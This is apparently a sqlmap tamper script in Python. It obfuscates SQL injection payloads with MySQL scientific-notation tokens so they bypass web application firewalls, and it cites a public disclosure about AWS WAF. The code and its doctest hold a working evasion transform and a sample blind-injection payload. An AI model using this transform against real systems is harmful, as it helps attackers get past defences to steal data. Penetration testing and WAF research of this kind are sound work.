#!/usr/bin/env python """ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ import re import random from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): pass def tamper(payload, **kwargs): """ Abuses MySQL scientific notation Requirement: * MySQL Notes: * Reference: https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/ >>> tamper('1 AND ORD(MID((CURRENT_USER()),7,1))>1') '1 AND ORD 1.e(MID((CURRENT_USER 1.e( 1.e) 1.e) 1.e,7 1.e,1 1.e) 1.e)>1' """ if payload: num=random.randint(1,9999999) payload = re.sub(r"[),.*^/|&]", r" {}.e\g<0>".format(num), payload) num=random.randint(1,9999999) payload = re.sub(r"(\w+)\(", lambda match: "%s %d.e(" % (match.group(1),num) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure return payload